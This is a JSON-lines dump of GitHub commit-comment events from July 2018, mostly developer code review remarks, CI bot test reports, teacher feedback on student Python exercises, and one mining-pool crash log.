{"id":"7928232075","type":"CommitCommentEvent","actor":{"login":"sriadiga"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29619670,"position":44,"line":27,"path":"src/main/java/com/krishagni/participantcsv/core/ParticipantCsvImporter.java","commit_id":"218665a529fa0931db80315b5f67753df0de25b6","created_at":"2018-07-06T10:50:53Z","updated_at":"2018-07-06T10:50:53Z","author_association":"NONE","body":"fix indentation"}},"created_at":"2018-07-06T10:50:53Z"}
{"id":"7928233695","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18003/programming-term2"},"payload":{"comment":{"id":29619676,"position":null,"line":null,"path":null,"commit_id":"740080f1d3a099952a13d5f101e0ffe7a090c7ad","created_at":"2018-07-06T10:51:17Z","updated_at":"2018-07-06T10:51:17Z","author_association":"NONE","body":"コードがスッキリしていて出題の意図ともほぼほぼ合っています。\r\n計算結果もOKでいいコードですね。\r\n\r\nコメントが「割引」なのでこのコードで問題ありませんが、僕なら\r\n「割り引いた後の率」でなく「割引率」を変数に格納します。\r\nコードを書いてしまうと下記の感じです。(修正点のみ抜粋)\r\n11行目：rate = 0.2\r\n16行目：payment = ((bear_v * bear_c) + (otumami_v * otumami_c) + ((yakitori_v * (1 - rate)) * yakitori_c)) - (point_kard)\r\n\r\n参考までに。\r\n\r\nあと、余談ですが、仕事だと横文字は変数名を英単語にするので、\r\nビール：beer\r\nカード：card\r\nとすると、より良いと思います。"}},"created_at":"2018-07-06T10:51:17Z"}
{"id":"7928239884","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29619694,"position":4,"line":31,"path":"Zend/zend_variables.h","commit_id":"f9297387f434b91e75db64ea32df8f22ee98bcde","created_at":"2018-07-06T10:52:46Z","updated_at":"2018-07-06T10:52:46Z","author_association":"MEMBER","body":"\"ref\" sounds like \"reference\" to me. Maybe `rc_dtor_func` or `refcounted_dtor_func` would be better?"}},"created_at":"2018-07-06T10:52:46Z"}
{"id":"7928240235","type":"CommitCommentEvent","actor":{"login":"soniaturcotte"},"repo":{"name":"soniaturcotte/downloads"},"payload":{"comment":{"id":29619695,"position":null,"line":null,"path":null,"commit_id":"a7d7cd2071075aa66af1509ced341baa43487162","created_at":"2018-07-06T10:52:51Z","updated_at":"2018-07-06T10:52:51Z","author_association":"OWNER","body":"Poster_NotObservant original quote by @tlwr"}},"created_at":"2018-07-06T10:52:51Z"}
{"id":"7928241574","type":"CommitCommentEvent","actor":{"login":"Vitaliy-1"},"repo":{"name":"Vitaliy-1/pkp-lib"},"payload":{"comment":{"id":29619700,"position":4,"line":112,"path":"locale/en_US/user.xml","commit_id":"36363e57ed26f74623cd7062304406bf683b5dfc","created_at":"2018-07-06T10:53:10Z","updated_at":"2018-07-06T10:53:10Z","author_association":"OWNER","body":"The idea is to sign the privacy statement just once, so no need to repeat it for every journal. The next message has a link to privacy statements for hosted journals."}},"created_at":"2018-07-06T10:53:10Z"}
{"id":"7928243936","type":"CommitCommentEvent","actor":{"login":"sriadiga"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29619708,"position":22,"line":22,"path":"src/main/java/com/krishagni/participantcsv/rest/ParticipantCsvController.java","commit_id":"218665a529fa0931db80315b5f67753df0de25b6","created_at":"2018-07-06T10:53:42Z","updated_at":"2018-07-06T10:53:42Z","author_association":"NONE","body":"Why is the return type string here? Is this how it is everywhere?"}},"created_at":"2018-07-06T10:53:42Z"}
{"id":"7928246296","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29619714,"position":null,"line":null,"path":null,"commit_id":"45a6fb0621388412f0651a6d97ca1db8e2f7e14d","created_at":"2018-07-06T10:54:17Z","updated_at":"2018-07-06T10:54:17Z","author_association":"OWNER","body":"Should say \"continuous with the rest of\""}},"created_at":"2018-07-06T10:54:17Z"}
{"id":"7928247588","type":"CommitCommentEvent","actor":{"login":"jasonxiaohan"},"repo":{"name":"jasonxiaohan/DataStructure"},"payload":{"comment":{"id":29619718,"position":null,"line":null,"path":null,"commit_id":"1a381fc2034a32ca60e5df4b4ae39f147c92674e","created_at":"2018-07-06T10:54:36Z","updated_at":"2018-07-06T10:54:36Z","author_association":"OWNER","body":"ArrayQueue,time：19.262033144541427s\r\nLoopQueue,time：0.09875742685143862s\r\n\r\nProcess finished with exit code 0"}},"created_at":"2018-07-06T10:54:36Z"}
{"id":"7928252520","type":"CommitCommentEvent","actor":{"login":"deepaknarayan"},"repo":{"name":"opsinai/qpn"},"payload":{"comment":{"id":29619723,"position":null,"line":null,"path":null,"commit_id":"cd0576ae540dd725f8001f3cfa44c7657332ddee","created_at":"2018-07-06T10:55:50Z","updated_at":"2018-07-06T10:55:50Z","author_association":"NONE","body":"xyx"}},"created_at":"2018-07-06T10:55:50Z"}
{"id":"7928253589","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.contenttypes"},"payload":{"comment":{"id":29619727,"position":null,"line":null,"path":null,"commit_id":"fda4e64f9c3229c78990529df4eb33b2da89c9de","created_at":"2018-07-06T10:56:06Z","updated_at":"2018-07-06T10:56:06Z","author_association":"NONE","body":"Markus Hilbert your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-06T10:56:06Z"}
{"id":"7928256196","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29619733,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-06T10:56:41Z","updated_at":"2018-07-06T10:56:41Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T10:56:41Z"}
{"id":"7928257796","type":"CommitCommentEvent","actor":{"login":"strehle"},"repo":{"name":"cloudfoundry/uaa"},"payload":{"comment":{"id":29619736,"position":null,"line":null,"path":null,"commit_id":"88cfffa7ad6f805064e245ff22f2588c548fd4e1","created_at":"2018-07-06T10:57:03Z","updated_at":"2018-07-06T10:57:03Z","author_association":"CONTRIBUTOR","body":"Hi, can you please adapt tests, which failing now in \r\nuaa/server/src/test/java/org/cloudfoundry/identity/uaa/oauth/UaaTokenServicesTests.java:1977: error: validateToken(String) has private access in UaaTokenServices\r\n        tokenServices.validateToken(accessToken.getValue());\r\n"}},"created_at":"2018-07-06T10:57:03Z"}
{"id":"7928261423","type":"CommitCommentEvent","actor":{"login":"maxencelaurent"},"repo":{"name":"Heigvd/Wegas"},"payload":{"comment":{"id":29619745,"position":null,"line":null,"path":null,"commit_id":"933cdb200038677bb08755fdd1baaa980047bb3b","created_at":"2018-07-06T10:57:56Z","updated_at":"2018-07-06T10:57:56Z","author_association":"MEMBER","body":"Je ne vois pas pourquoi c'est spécifique au media game. Est-ce qu'il ne vaudrait pas mieux la mettre avec les autres afficheurs de nombres ?  "}},"created_at":"2018-07-06T10:57:56Z"}
{"id":"7928261760","type":"CommitCommentEvent","actor":{"login":"adisky"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29619746,"position":6,"line":59,"path":"prow/plugins/plugins.go","commit_id":"0167ec76f7d7cc3d3a1a55300fca5721fa2facaa","created_at":"2018-07-06T10:58:01Z","updated_at":"2018-07-06T10:58:01Z","author_association":"NONE","body":"you can check master code \r\nhttps://github.com/kubernetes/test-infra/blob/master/prow/plugins/plugins.go\r\nthere is a single line gap\r\ncheck preview for your file\r\nhttps://github.com/rohanand/test-infra/blob/0167ec76f7d7cc3d3a1a55300fca5721fa2facaa/prow/plugins/plugins.go"}},"created_at":"2018-07-06T10:58:01Z"}
{"id":"7928262475","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619750,"position":29,"line":1228,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T10:58:11Z","updated_at":"2018-07-06T10:58:11Z","author_association":"NONE","body":"You have to disable indirect segments and continue with the connection."}},"created_at":"2018-07-06T10:58:11Z"}
{"id":"7928264896","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619758,"position":41,"line":1240,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T10:58:46Z","updated_at":"2018-07-06T10:58:46Z","author_association":"NONE","body":"Is it possible to return nseg != BLKIF_MAX_INDIRECT_PAGES_PER_REQUEST and error == 0?"}},"created_at":"2018-07-06T10:58:46Z"}
{"id":"7928265765","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29619763,"position":null,"line":null,"path":null,"commit_id":"269226c1a69527345e85a7f4388e21b5d6369047","created_at":"2018-07-06T10:58:58Z","updated_at":"2018-07-06T10:58:58Z","author_association":"NONE","body":"まず残念ながら結果が不正解で、仕様を満たしきれていないです。\r\n次回講義までに提出で再評価しますので、直してみてください。修正点は以下です。\r\n\r\n結果が不正解の箇所：\r\n・焼鳥が「2割引の値段」でなく、「2割(8割引)の値段」になってしまっています。\r\n\r\n出題の意図と異なる箇所：\r\n・出題内容に登場するそれぞれの値を変数化して計算してください。\r\n　(各商品それぞれの単価、各商品それぞれの数量、割引率、値引きポイント)\r\n\r\n変数名の改善点：\r\n・ビールは\"beer\"ですね。\"bear\"だとクマになっちゃいます（・(ェ)・）"}},"created_at":"2018-07-06T10:58:58Z"}
{"id":"7928265856","type":"CommitCommentEvent","actor":{"login":"cjohannsen"},"repo":{"name":"plentymarkets/plugin-ceres"},"payload":{"comment":{"id":29619764,"position":null,"line":null,"path":null,"commit_id":"4b582efd69a126cafa099a2d68b986d857934936","created_at":"2018-07-06T10:58:59Z","updated_at":"2018-07-06T10:58:59Z","author_association":"CONTRIBUTOR","body":"Hallo @lkreimann,\r\n\r\nvielen Dank für dein Feedback, ich werde mir die Stelle im Code einmal ansehen und dir Rückmeldung geben.\r\n\r\nLiebe Grüße\r\nChris"}},"created_at":"2018-07-06T10:58:59Z"}
{"id":"7928270363","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619776,"position":68,"line":1321,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:00:05Z","updated_at":"2018-07-06T11:00:05Z","author_association":"NONE","body":"This magic `16` value needs to be defined somewhere, BUS_DMA_XEN_DOMID_SHIFT or some such."}},"created_at":"2018-07-06T11:00:05Z"}
{"id":"7928273066","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29619786,"position":36,"line":48,"path":"src/system/ThemeModule/Engine/AssetBag.php","commit_id":"c97c60a5383fb74024f8ed06e8030b5332c6dfd2","created_at":"2018-07-06T11:00:40Z","updated_at":"2018-07-06T11:00:40Z","author_association":"MEMBER","body":"Reverted at https://github.com/zikula/core/compare/9bd227cc1ac46b9f777c7b14c30144249aa513d5...8292df18c25e0810afee3ce4a6d3b8d0bd1f272a"}},"created_at":"2018-07-06T11:00:40Z"}
{"id":"7928276368","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29619796,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-06T11:01:26Z","updated_at":"2018-07-06T11:01:26Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T11:01:26Z"}
{"id":"7928276677","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619798,"position":59,"line":1260,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:01:30Z","updated_at":"2018-07-06T11:01:30Z","author_association":"NONE","body":"I don't think you need the otherend_id variable, you can use xenbus_get_otherend_id directly."}},"created_at":"2018-07-06T11:01:30Z"}
{"id":"7928278749","type":"CommitCommentEvent","actor":{"login":"sandesh93"},"repo":{"name":"sandesh93/tomcatUI"},"payload":{"comment":{"id":29619801,"position":24,"line":20,"path":"scripts/Tomcat_Start.sh","commit_id":"161d5951ae7ed2f5fffc2a8e010dbba130ff265a","created_at":"2018-07-06T11:02:01Z","updated_at":"2018-07-06T11:02:01Z","author_association":"OWNER","body":"what is this"}},"created_at":"2018-07-06T11:02:01Z"}
{"id":"7928281739","type":"CommitCommentEvent","actor":{"login":"sushantkumr"},"repo":{"name":"sushantkumr/vyper"},"payload":{"comment":{"id":29619811,"position":null,"line":null,"path":null,"commit_id":"6a4b4210b0926d750d0de4faad3e3590b2072808","created_at":"2018-07-06T11:02:45Z","updated_at":"2018-07-06T11:02:45Z","author_association":"OWNER","body":"Fixed a typo in error message"}},"created_at":"2018-07-06T11:02:45Z"}
{"id":"7928281944","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619814,"position":27,"line":1226,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:02:48Z","updated_at":"2018-07-06T11:02:48Z","author_association":"OWNER","body":"Oops. I forget this too often. I'll fix it."}},"created_at":"2018-07-06T11:02:48Z"}
{"id":"7928286021","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29619829,"position":null,"line":null,"path":null,"commit_id":"a7bdd2a39f457588ff18037b61d7f96e5fbf0557","created_at":"2018-07-06T11:03:47Z","updated_at":"2018-07-06T11:03:47Z","author_association":"NONE","body":"素晴らしい!出題の意図に沿っていて見本のような、読みやすいコードになっています。\r\n強いて改善点を上げるなら、「各商品の単価」「各商品の数量」といった具合に\r\nコメントをもう少し書いてもらうとより良いです。\r\n\r\n業務でコードを書く際、1人で最初から最後までコードをメンテナンスをするのは稀なので\r\n後から見た第三者が分かるようにコメントを入れておくと親切かと思います。"}},"created_at":"2018-07-06T11:03:47Z"}
{"id":"7928286895","type":"CommitCommentEvent","actor":{"login":"857487"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29619838,"position":null,"line":null,"path":null,"commit_id":"8730c9946d62745096b3f1feb87c7ddfb2300c7c","created_at":"2018-07-06T11:03:59Z","updated_at":"2018-07-06T11:03:59Z","author_association":"NONE","body":"(node:28197) DeprecationWarning: (node-watch) First param in callback function is replaced with event name since 0.5.0, use (evt, filename) => {} if you want to get the filename  \r\ncompatibility\r\nhttps://github.com/hellcatz/z-nomp/commit/03e141d0b67030e44fb5357d5388b21d5ca7ad3e"}},"created_at":"2018-07-06T11:03:59Z"}
{"id":"7928288274","type":"CommitCommentEvent","actor":{"login":"reers"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":29619842,"position":null,"line":null,"path":null,"commit_id":"dbe8bfb7d6dcaf45374c58c1e7ac9b194fcfd167","created_at":"2018-07-06T11:04:20Z","updated_at":"2018-07-06T11:04:20Z","author_association":"NONE","body":"Working great. Thank you."}},"created_at":"2018-07-06T11:04:20Z"}
{"id":"7928289076","type":"CommitCommentEvent","actor":{"login":"857487"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29619844,"position":null,"line":null,"path":null,"commit_id":"8730c9946d62745096b3f1feb87c7ddfb2300c7c","created_at":"2018-07-06T11:04:32Z","updated_at":"2018-07-06T11:04:32Z","author_association":"NONE","body":"2018-07-06 19:01:58 [POSIX]\t[Connection Limit] (Safe to ignore) POSIX module not installed and resource (connection) limit was not raised\r\n2018-07-06 19:01:59 [Master]\t[CLI] CLI listening on port 17117\r\n2018-07-06 19:01:59 [Website]\t[Server] Website started on 0.0.0.0:88\r\n2018-07-06 19:01:59 [Switching]\t[Setup] (Thread 1) Loading last proxy state from redis\r\n2018-07-06 19:01:59 [Pool]\t[bitcoinx] (Thread 1) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:01:59 [Master]\t[PoolSpawner] Fork 0 died, spawning replacement worker...\r\n2018-07-06 19:01:59 [Website]\t[bitcoinx] Unauthorized RPC access - invalid RPC username or password\r\n2018-07-06 19:02:00 [Switching]\t[Setup] (Thread 2) Loading last proxy state from redis\r\n2018-07-06 19:02:00 [Pool]\t[bitcoinx] (Thread 2) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:02:00 [Master]\t[PoolSpawner] Fork 1 died, spawning replacement worker...\r\n2018-07-06 19:02:00 [Switching]\t[Setup] (Thread 3) Loading last proxy state from redis\r\n2018-07-06 19:02:00 [Pool]\t[bitcoinx] (Thread 3) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:02:00 [Master]\t[PoolSpawner] Fork 2 died, spawning replacement worker...\r\n2018-07-06 19:02:00 [Switching]\t[Setup] (Thread 4) Loading last proxy state from redis\r\n2018-07-06 19:02:00 [Pool]\t[bitcoinx] (Thread 4) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:02:00 [Master]\t[PoolSpawner] Fork 3 died, spawning replacement worker...\r\n2018-07-06 19:02:00 [Switching]\t[Setup] (Thread 5) Loading last proxy state from redis\r\n2018-07-06 19:02:00 [Pool]\t[bitcoinx] (Thread 5) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:02:00 [Master]\t[PoolSpawner] Fork 4 died, spawning replacement worker...\r\n2018-07-06 19:02:01 [Switching]\t[Setup] (Thread 6) Loading last proxy state from redis\r\n2018-07-06 19:02:01 [Pool]\t[bitcoinx] (Thread 6) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:02:01 [Master]\t[PoolSpawner] Fork 5 died, spawning replacement worker...\r\n^C\r\n"}},"created_at":"2018-07-06T11:04:32Z"}
{"id":"7928289909","type":"CommitCommentEvent","actor":{"login":"BusinessAlpaca"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29619847,"position":27,"line":27,"path":"N014Collatz10.java","commit_id":"1a60b1fb4298de98820405f1c0d2144c8287616c","created_at":"2018-07-06T11:04:45Z","updated_at":"2018-07-06T11:04:45Z","author_association":"OWNER","body":"Tried to make the suggested you're hinting at. Still no go. Put he updated file here:\r\nMyProjectEulerWork/N014Collatz10.java"}},"created_at":"2018-07-06T11:04:45Z"}
{"id":"7928290683","type":"CommitCommentEvent","actor":{"login":"SethArchambault"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":29619850,"position":null,"line":null,"path":null,"commit_id":"7f040009eed6783ec5c9b658979a29df5ccba5c6","created_at":"2018-07-06T11:04:56Z","updated_at":"2018-07-06T11:04:56Z","author_association":"NONE","body":"Ha was just gonna post this fix! "}},"created_at":"2018-07-06T11:04:56Z"}
{"id":"7928291008","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619853,"position":41,"line":1240,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:05:01Z","updated_at":"2018-07-06T11:05:01Z","author_association":"OWNER","body":"It _should_ not be possible. But this would help catch bugs in the busdma implementation. And now that I think about it, I think it should be a KASSERT instead.\r\n\r\nIf you want, I would remove it once we establish everything works as it is supposed to."}},"created_at":"2018-07-06T11:05:01Z"}
{"id":"7928292562","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619856,"position":97,"line":1380,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:05:25Z","updated_at":"2018-07-06T11:05:25Z","author_association":"NONE","body":"Do you mean xbd_io_dmat or cm_indirectionmap? I don't see bus_dmamap_create using xbd_io_tag."}},"created_at":"2018-07-06T11:05:25Z"}
{"id":"7928294978","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619862,"position":59,"line":1260,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:06:01Z","updated_at":"2018-07-06T11:06:01Z","author_association":"OWNER","body":"I added it as a convenience. I'll remove it."}},"created_at":"2018-07-06T11:06:01Z"}
{"id":"7928298845","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619869,"position":109,"line":1391,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:07:00Z","updated_at":"2018-07-06T11:07:00Z","author_association":"NONE","body":"This again needs some define, ie: `BUS_DMA_XEN_RO (1u << 16)`"}},"created_at":"2018-07-06T11:07:00Z"}
